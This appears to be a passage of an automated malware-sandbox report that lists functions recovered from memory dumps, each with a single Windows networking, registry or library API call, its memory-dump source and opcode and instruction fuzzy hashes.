Instruction ID: ff9ff5befc464613c2bb8e43ad99f327e69a68de5fec5e8b6f385ac74eb9604f
Opcode Fuzzy Hash: 3dd924aae42bdfda75d4c690b799f2823cb7e23838b7b99afc094728b7b77098
Instruction Fuzzy Hash: A121A176409780AFEB228F25DC40A52FFB4EF47214F0884CEED858F163D265A918DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02CC050A, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 02CC0575

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 8ceb322609fde685fe2edf28bb42b19d8511908b28881c72f1f1e69d8fa08793
Instruction ID: a1d30e6858010e6a0d5479cf5f5e659cc8d07e10c70de09676484273d9997dc6
Opcode Fuzzy Hash: 8ceb322609fde685fe2edf28bb42b19d8511908b28881c72f1f1e69d8fa08793
Instruction Fuzzy Hash: 6E21AE71500200AFE720DF65CC45B66FBE8EF44320F14846EEE858B241D771E504CB75

Uniqueness

Uniqueness Score: -1.00%

Function 0101B84E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 0101B8BA

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 81b6c9915ccb77a91690739761028f744cb55a4f3b5e62b0fa667958fc1ca0f4
Instruction ID: 343b463c982647585c139e1ada8432c2a3c7730a7be9c0d18ac5170897036138
Opcode Fuzzy Hash: 81b6c9915ccb77a91690739761028f744cb55a4f3b5e62b0fa667958fc1ca0f4
Instruction Fuzzy Hash: C721CF71400200AFE721DF65DC45B66FBE8EF08710F14845AEE858B252D3B5A404CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3EFA, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 02CC3F76

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: d4209e82d564d3decc919d3c1598011874a3a89b534d8711ac72f020246e1f61
Instruction ID: 6d7c497b2946ecf8a398485bcef66d58acccf37fd637dddaaa055134f2edf7b3
Opcode Fuzzy Hash: d4209e82d564d3decc919d3c1598011874a3a89b534d8711ac72f020246e1f61
Instruction Fuzzy Hash: B3218071408384AFDB228F65DC44B52FFF4EF4A210F1884DAED858B162D375A519DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02CC2E72, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC2EF0

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 68769f9a555040d3abd68956df2f2cecf762d899ac756358e131871986c9cc02
Instruction ID: 6bece11518bf451e5ed2d4bacd871e2c34b96e71b3c7ce184f48d53b40435dcd
Opcode Fuzzy Hash: 68769f9a555040d3abd68956df2f2cecf762d899ac756358e131871986c9cc02
Instruction Fuzzy Hash: CC21A571409384AFD7228B15CC44F96FFB8EF46314F1884DBE9849B152C364A509CB72

Uniqueness

Uniqueness Score: -1.00%

Function 02CC060A, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 02CC067E

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: eca0fa68286fd353f61bc140031072459e761f65c7cadb254c228b97857fecde
Instruction ID: 88938e0f4f57d707e5382b03380f2ad9accb376d46aa3f9c0e4feeb16f01dbce
Opcode Fuzzy Hash: eca0fa68286fd353f61bc140031072459e761f65c7cadb254c228b97857fecde
Instruction Fuzzy Hash: D2219D71500600EFE721DF55DC84FAAFBE8EF48720F14845EEE859B251D7B1A509CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC36FA, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 02CC375D

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: d38d67ab8a5020819236d14d0096a6d7dffb2432afb513a225f40b57071326fe
Instruction ID: c6f548a9789ff5e2dd8c3cbab6c8ffdbdc0a02fcbfab151e48950c7460fd9cb3
Opcode Fuzzy Hash: d38d67ab8a5020819236d14d0096a6d7dffb2432afb513a225f40b57071326fe
Instruction Fuzzy Hash: 9011D0B1500244AEFB109F25DD85F6BFBACEF45720F2488ABEE449B241D674A5048BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC38FE, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC3968

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: b12a2a6c9ce4e949b95b88bd10c1c497da640dd9054dc38975fac9835f7588bf
Instruction ID: 0d2a0cd9cffa526386fbb94de2d267c91d997660770374683a42aa83d16e34de
Opcode Fuzzy Hash: b12a2a6c9ce4e949b95b88bd10c1c497da640dd9054dc38975fac9835f7588bf
Instruction Fuzzy Hash: A711D071400244EEEB21DF55DC84FABFBACEF45320F1484ABEE459B201D674A508CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC026E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC02E0

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8ae636641859343b1a8233dedc2330aac59289c80e84925305397f00a19d8650
Instruction ID: 38faaf6b18666bfaee85b89b3d786584ea3d1687795b73bc5d807564085df699
Opcode Fuzzy Hash: 8ae636641859343b1a8233dedc2330aac59289c80e84925305397f00a19d8650
Instruction Fuzzy Hash: F411AC72500604EFEB20CF15CC80F67FBE8EF49710F18846AEA459B252D760E508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC1B95, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 02CC1C11

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 4db5e1c089c648361fe65604e3e303685e68dacd37c40a2c7906568635f4857c
Instruction ID: 39337b4a2428390c9f1b4cfd36129afe8e00c46a18072ecc20b330d55feb4a7c
Opcode Fuzzy Hash: 4db5e1c089c648361fe65604e3e303685e68dacd37c40a2c7906568635f4857c
Instruction Fuzzy Hash: 2221C3B54087849FD7228F15DC44B62BFE8EF46214F18808AED848B253D365E509DB72

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0C56, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC0CB5

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 2249deb69f15c4e53aa147879022223c6a9dea436f3b20ba871fd3cc196cb26d
Instruction ID: fcb5e760dbbdf41ae88a5d70ca65061062a502237190dab78439768d7a3f06ee
Opcode Fuzzy Hash: 2249deb69f15c4e53aa147879022223c6a9dea436f3b20ba871fd3cc196cb26d
Instruction Fuzzy Hash: 5111E271500600EFEB21CF69DC45FABFBA8EF44720F14846BEE459B251D6B1A509CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC136E, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC13D2

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 10e484598411e32a29acd4b61ed6ef8666ab81143dd6fa8c29792b54e04af759
Instruction ID: 5e83de83dc6db4d98a78afe4234dcdee9d6d8df7b6218eba476d66ea5a43567b
Opcode Fuzzy Hash: 10e484598411e32a29acd4b61ed6ef8666ab81143dd6fa8c29792b54e04af759
Instruction Fuzzy Hash: 54119071500204AEEB21DF56DC84F97FBACEF45324F18846BEA499B242D6B4A505CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0101A65A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0101A6CC

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0ca109deee68950fad3761f2a9f186273b1390cf74b5628e1c59a5bbfd2b666d
Instruction ID: e57b987857695c6e3f9f467c204a316a89aa8b59df99cf5b40cb92a517a02a94
Opcode Fuzzy Hash: 0ca109deee68950fad3761f2a9f186273b1390cf74b5628e1c59a5bbfd2b666d
Instruction Fuzzy Hash: 63216A7140A3C4AFD7138B259C54652BFB4DF47224F0980DBEDC48F1A3D2695908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 02CC10AA, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC110B

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: 63f94201685709920294a3f218bb368def4db4d387fe35c73b24910dd6b07681
Instruction ID: 678f16d8d6d407e8db6a9bcc1f51c791a17956b61143a6636984842e20401dbb
Opcode Fuzzy Hash: 63f94201685709920294a3f218bb368def4db4d387fe35c73b24910dd6b07681
Instruction Fuzzy Hash: E411B271500204AEE720CF56DD84F97FBACEF45720F18846BEE499B242D7B4A504CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0101A5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0101A61A

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: adffc98c2966ba148a0ac6d6ea48422c73f536ea634aa78b14832c6665215f00
Instruction ID: bd79266bbeaf3b1c6f1402d2aa01c273f0bd357c7ccc7e2df37275b3adabf7d6
Opcode Fuzzy Hash: adffc98c2966ba148a0ac6d6ea48422c73f536ea634aa78b14832c6665215f00
Instruction Fuzzy Hash: EE118471409380AFDB238F55DC44A62FFF4EF4A214F0884DAEE858B163D275A518DB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4ABE, Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC4B28

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 9ab33fd7f904826a0cd218ba39c7df14df26548b0506e0f8fb2b9ba7c77cc3e0
Instruction ID: c4498a34453ba6876f52b3c832d7508573888b973d03954e11f66949683c9271
Opcode Fuzzy Hash: 9ab33fd7f904826a0cd218ba39c7df14df26548b0506e0f8fb2b9ba7c77cc3e0
Instruction Fuzzy Hash: A4119D76500A04AEEB318F15CC40FA7FBA8EF48720F14C45AEE459B251D661A509CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4EA4, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02CC4F11

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a24b03386278e912a79c553046de756eb775ae2febfd399da26e6ff9ec9b9f56
Instruction ID: 000f98fb898b57c2e41dc5a5a7d6c395285e7a4ee4acdaede5c92cf2dcbb28be
Opcode Fuzzy Hash: a24b03386278e912a79c553046de756eb775ae2febfd399da26e6ff9ec9b9f56
Instruction Fuzzy Hash: 6E11AF754093C09FDB228B25DC40B52BFB4EF06224F0980DEED858F563D265A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0032, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC0091

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 2024f73118993a51d697a00a9cb3cbd28fda830ce5d6019bba5321d0c5709b06
Instruction ID: ad5e37646aea5f884ad1487ac805202febafee7695d1c05b1c5418e0571674a3
Opcode Fuzzy Hash: 2024f73118993a51d697a00a9cb3cbd28fda830ce5d6019bba5321d0c5709b06
Instruction Fuzzy Hash: 6E11BF71400200EFEB218F55DC45FA7FBA8EF44320F1484ABEE459B251D675A508CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4B7A, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 02CC4BDB

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1e21f43531ae3ade01622358210ed444da25a586c776594a13df7885d21807df
Instruction ID: b94741ae03b527edb6fdf4a6adb2a0efbaf6ad2c271d4cc0eaa21b495869a5e7
Opcode Fuzzy Hash: 1e21f43531ae3ade01622358210ed444da25a586c776594a13df7885d21807df
Instruction Fuzzy Hash: CA118E71508380AFDB258F25DC95B56BFE8EF46220F0884AEED85CB262D274A944CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC01AA, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetIfEntry.IPHLPAPI(?,00000E2C,?,?), ref: 02CC0221

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Entry
String ID:
API String ID: 3940594292-0
Opcode ID: 530cc1ceb3365a468af3ea4e470dd0bb95534dacc4873feac5b33586803f3cca
Instruction ID: 9df0cf1150c71c3ae7e8b6de317490616a0fa8cf8df21e25e6de1c8e34d5cb84
Opcode Fuzzy Hash: 530cc1ceb3365a468af3ea4e470dd0bb95534dacc4873feac5b33586803f3cca
Instruction Fuzzy Hash: F411E671408380AFD3118B15CC45F26FFB4EF86720F09818BED444B292D225B805CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC50BD, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 02CC5128

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 5de5bb1c324b43ff24a92bcf2efc2dda3c2eca7797f4fbe78a01208cd2987d81
Instruction ID: ab8a635757f4e6c8bc942ad548754e62975cc923cee8337f7c2a8c8e20f5b706
Opcode Fuzzy Hash: 5de5bb1c324b43ff24a92bcf2efc2dda3c2eca7797f4fbe78a01208cd2987d81
Instruction Fuzzy Hash: 8F117C754093C0AFDB128B25DC44B62BFB4DF47624F0980DEED859F263D2656908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CC118E, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC11E7

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 64e01b35d0b7c98d1dcc58331b6b3b5569f53cdfb709201ad3bfa4b06579d568
Instruction ID: c3171c6baddd613b871b7b876e4d875ea9853f052a190ddadeb357c94bd71dfb
Opcode Fuzzy Hash: 64e01b35d0b7c98d1dcc58331b6b3b5569f53cdfb709201ad3bfa4b06579d568
Instruction Fuzzy Hash: 3811CA71500204AFE711DF55DC45F57FBA8EF45320F18C46BEE499B242D6B4A505CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0101A2D6, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0101A32C

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 45ccc6be0ac33e36d5a0f1041626bb9709825213bd698729909f167b343ecbda
Instruction ID: bf8890897bb273bb7348ba5eb43570a729d2fcf5958082289745efa4f6aee245
Opcode Fuzzy Hash: 45ccc6be0ac33e36d5a0f1041626bb9709825213bd698729909f167b343ecbda
Instruction Fuzzy Hash: 221194715093C0AFD7128F25DC54B56BFA8DF46224F0880EBED858F653D275A508CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CC304E, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC30AD

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 398de15a8c3b232ef8f890bf007d95a75d4411792885f178008d6334750e09fa
Instruction ID: fc065ca90cd8bcc45ec55552bc1c799b1df37c74633790349e0c22ebac8cb244
Opcode Fuzzy Hash: 398de15a8c3b232ef8f890bf007d95a75d4411792885f178008d6334750e09fa
Instruction Fuzzy Hash: D611E032500604EFEB219F15EC40F66FFA8EF04720F24C49BEE455B251C271A509CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC459A, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E2C), ref: 02CC4603

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5e137cb8056203424e139d6614a4cd8322a275a85bee6ce1b20b72e2049f46bd
Instruction ID: 84911685cce9fa3974f57d106225500139780a51cb1eac357d9c31565af76d8c
Opcode Fuzzy Hash: 5e137cb8056203424e139d6614a4cd8322a275a85bee6ce1b20b72e2049f46bd
Instruction Fuzzy Hash: 5C11E171500600AFF720AB15DC81FA6FBA8DF45720F24C09AEE455A285D6B5A549CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0101A078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0101A0D5

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 1bdb5daa4450537c1aa820e1e950084ac00d44c952e79fc936354b71a599c5fc
Instruction ID: 3ad0159bcc9a92f5ba8f862979c3312225fd171c6bfb36f6738fde69b4ddca84
Opcode Fuzzy Hash: 1bdb5daa4450537c1aa820e1e950084ac00d44c952e79fc936354b71a599c5fc
Instruction Fuzzy Hash: 6B118F71409380AFDB22CF15DD44B52FFB4EF4A224F0884DAEE858F253D275A558CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CC362E, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC3687

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: cea9b6a4cb03e864d9a76319f349c088f92ed95a4c0b9aaa13ea0b230e15b045
Instruction ID: 8727521cc68fd970a314bab1be053c46d1eb84cc1e4c885b9f5f1475c1e48c49
Opcode Fuzzy Hash: cea9b6a4cb03e864d9a76319f349c088f92ed95a4c0b9aaa13ea0b230e15b045
Instruction Fuzzy Hash: 2A11E171400244AFEB209F15DC84FAAFBA8EF45324F24C0ABEE459B341D674A508CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC15CC, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 02CC162C

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 3c838bd768bf6748f695cbdfe73c32ac3515af037b827dd505b6a2e01355d262
Instruction ID: 1a051b0e815218c1de673bc6d1460104b5f51e32950ba90ca8936e5dc57cbae4
Opcode Fuzzy Hash: 3c838bd768bf6748f695cbdfe73c32ac3515af037b827dd505b6a2e01355d262
Instruction Fuzzy Hash: 82119071409384AFDB228F55DC44B52FFF4EF46220F08849EEE898B162D375A518DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3146, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetPerAdapterInfo.IPHLPAPI(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC319F

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AdapterInfo
String ID:
API String ID: 3405139893-0
Opcode ID: cea9b6a4cb03e864d9a76319f349c088f92ed95a4c0b9aaa13ea0b230e15b045
Instruction ID: fd1030fa72af3bf8c4a6927ae908c88e042df6acb8829b7dfe19da7e6a306196
Opcode Fuzzy Hash: cea9b6a4cb03e864d9a76319f349c088f92ed95a4c0b9aaa13ea0b230e15b045
Instruction Fuzzy Hash: AF11E171500244AEEB218F15DC84F66FBA8EF45320F24C4ABEE455B341D274A508CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC2E9A, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC2EF0

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: aeeed7de709daf11a52384bf581c1ddad38744eddfefe13aa0fb4cb29b1fd0db
Instruction ID: bdd52eee4e3c4c914526e66b6aa42cf2d8bb223b0842bdea0e5c6c5bf36f2a48
Opcode Fuzzy Hash: aeeed7de709daf11a52384bf581c1ddad38744eddfefe13aa0fb4cb29b1fd0db
Instruction Fuzzy Hash: 50010471400204AEEB208F15CC80F66FBA8EF45324F24809BEE449B241D3B4A505CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC296F, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 02CC29D1

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2b323e29644f98b1bc68f80d1d6f87d75fe4e4c7e94403f05221c675d15e754f
Instruction ID: 1acd05d814a5b66c5459a8955c1c3a54e0d1ca5d25010d28cee94c745583afd5
Opcode Fuzzy Hash: 2b323e29644f98b1bc68f80d1d6f87d75fe4e4c7e94403f05221c675d15e754f
Instruction Fuzzy Hash: 53118F714093C0AFDB228F25DC44A52FFB4EF4A220F0885DEEE854B563D265A518DB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CC537A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 02CC53C2

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1b39d340e3d487dd650acfd6c1d7234b1a05e0cb575edfef4a6291a6fc471b55
Instruction ID: fc29f2734d9ea2116de20919322bbbf68b016d91b8b4c432c0f22152b289361c
Opcode Fuzzy Hash: 1b39d340e3d487dd650acfd6c1d7234b1a05e0cb575edfef4a6291a6fc471b55
Instruction Fuzzy Hash: AA11A571A006009FD720CF29D845756FBE8EF44260F1884AEDD49DB242E7B0F504CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0101BD42, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 0101BD95

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 1240b3e3c74d70e2f1290aac8bcc6a701dfb4f5a29ff10a4da0f663a5929a856
Instruction ID: 9869218f858f32ab6b634fac62ceca62e4908da4f4c1a47cc72929977a419777
Opcode Fuzzy Hash: 1240b3e3c74d70e2f1290aac8bcc6a701dfb4f5a29ff10a4da0f663a5929a856
Instruction Fuzzy Hash: B001D671500604AEE711DF19DC45F67FFA8DF05720F54849BEE459B245D678A404CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0101A87F, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0101A8E0

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: fc98d01a79ec573c68eb06eee4ef8703ccb2d63760acc4260176ebec617333bf
Instruction ID: 3c8509727de20546f62ad0ce977e38b523aacb04375c75b8ed85e439dfcab8fd
Opcode Fuzzy Hash: fc98d01a79ec573c68eb06eee4ef8703ccb2d63760acc4260176ebec617333bf
Instruction Fuzzy Hash: B511C1714493C4AFD712CF25DC45B52BFA4EF06224F0984EBED858F253D279A948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3F2A, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 02CC3F76

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 7a764e6cde7809e5800cfa2fd421e92b5a59e826a43c5aa7a3a4535204118332
Instruction ID: 020d177c264b65fa9d33c47e22893ad1f03d812f7b370403b14b2a8e729bf178
Opcode Fuzzy Hash: 7a764e6cde7809e5800cfa2fd421e92b5a59e826a43c5aa7a3a4535204118332
Instruction Fuzzy Hash: C4115A31500644AFDB20CF55E844B56FBF4EF48320F18C8AAEE498B622D372E559DB71

